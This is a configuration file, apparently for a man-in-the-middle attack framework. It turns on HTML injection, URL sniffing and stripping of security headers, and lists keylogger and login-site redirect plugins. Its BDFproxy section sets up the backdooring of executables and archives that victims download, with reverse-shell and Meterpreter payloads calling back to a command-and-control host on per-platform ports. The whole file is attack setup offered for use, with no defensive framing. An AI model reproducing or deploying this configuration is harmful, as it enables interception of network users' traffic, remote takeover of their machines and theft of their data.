[Screenshot]
	status = disabled

[KeyLogger]
	status = disabled

[Survey]
	status = disabled
	
	extensions = gif|jpg|png|ico|js|php|asp|jsp|doc|docm|docx|xls|xlsx|xlsm

[InjectHTML]
	status = enabled

[NoCache]
	status = enabled

[NonSecureHeaders]
	status = enabled

[Redirect]
	status = disabled
	
	[[domains]]
		domain1 = facebook.com|www.example.com
		domain2 = twitter.com|www.example.com
		domain3 = gmail.com|www.example.com
		domain4 = paypal.com|www.example.com

[URLsnarf]
	status = enabled

[Upsidedown]
	status = disabled

[Replace]
	status = disabled
	
	[[regex]]
		regex1 = "I'm Feeling Lucky||I'm Feeling Lucky, Yeah ;)"
		regex2 = Facebook||CaraLibro

[BDFproxy]
	status = disabled
	
	[[hosts]]
		#whitelist host/IP - patch these only. 
		#ALL is everything, use the blacklist to leave certain hosts/IPs out
		
		whitelist = ALL
		
		#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
		
		blacklist = ,	# a comma is null do not leave blank
	
	
	[[keywords]]
		#These checks look at the path of a url for keywords
		
		whitelist = ALL
		
		#For blacklist note binaries that you do not want to touch at all
		
		# Also applied in zip files
		
		blacklist = Tcpview.exe, skype.exe, .dll
	
	
	[[ZIP]]
		# patchCount is the max number of files to patch in a zip file
		# After the max is reached it will bypass the rest of the files 
		# and send on it's way
		
		patchCount = 5
		
		# In Bytes
		maxSize = 40000000
		
		blacklist = .dll,	#don't do dlls in a zip file
	
	[[TAR]]
		# patchCount is the max number of files to patch in a tar file
		# After the max is reached it will bypass the rest of the files
		# and send on it's way
		
		patchCount = 5
		
		# In Bytes
		maxSize = 40000000
		
		blacklist = ,	# a comma is null do not leave blank
	
	[[targets]]
		#MAKE SURE that your settings for host and port DO NOT
		# overlap between different types of payloads
		
		[[[ALL]]]	# DEFAULT settings for all targets REQUIRED
			
			LinuxType = ALL	# choices: x86/x64/ALL/None
			WindowsType = ALL	# choices: x86/x64/ALL/None
			FatPriority = x64	# choices: x86 or x64
			
			FileSizeMax = 60000000	# ~60 MB (just under) No patching of files this large
			
			CompressedFiles = True	#True/False
			
			[[[[LinuxIntelx86]]]]
				SHELL = reverse_shell_tcp	# This is the BDF syntax
				HOST = 10.0.0.1	# The C2
				PORT = 6660
				SUPPLIED_SHELLCODE = None
				MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
			
			[[[[LinuxIntelx64]]]]
				SHELL = reverse_shell_tcp
				HOST = 10.0.0.1
				PORT = 6661
				SUPPLIED_SHELLCODE = None
				MSFPAYLOAD = linux/x64/shell_reverse_tcp
			
			[[[[WindowsIntelx86]]]]
				PATCH_TYPE = APPEND	#JUMP/SINGLE/APPEND
				# PATCH_METHOD overwrites PATCH_TYPE with jump
				# PATCH_METHOD = automatic
				PATCH_METHOD = ""
				HOST = 10.0.0.1
				PORT = 6662
				SHELL = iat_reverse_tcp_stager_threaded
				SUPPLIED_SHELLCODE = None
				ZERO_CERT = True
				PATCH_DLL = False
				MSFPAYLOAD = windows/meterpreter/reverse_tcp
			
			[[[[WindowsIntelx64]]]]
				PATCH_TYPE = APPEND	#JUMP/SINGLE/APPEND
				# PATCH_METHOD overwrites PATCH_TYPE with jump
				# PATCH_METHOD = automatic
				PATCH_METHOD = ""
				HOST = 10.0.0.1
				PORT = 6663
				SHELL = iat_reverse_tcp_stager_threaded
				SUPPLIED_SHELLCODE = None
				ZERO_CERT = True
				PATCH_DLL = False
				MSFPAYLOAD = windows/x64/shell/reverse_tcp
			
			[[[[MachoIntelx86]]]]
				SHELL = reverse_shell_tcp
				HOST = 10.0.0.1
				PORT = 6664
				SUPPLIED_SHELLCODE = None
				MSFPAYLOAD = linux/x64/shell_reverse_tcp
			
			[[[[MachoIntelx64]]]]
				SHELL = reverse_shell_tcp
				HOST = 10.0.0.1
				PORT = 6665
				SUPPLIED_SHELLCODE = None
				MSFPAYLOAD = linux/x64/shell_reverse_tcp
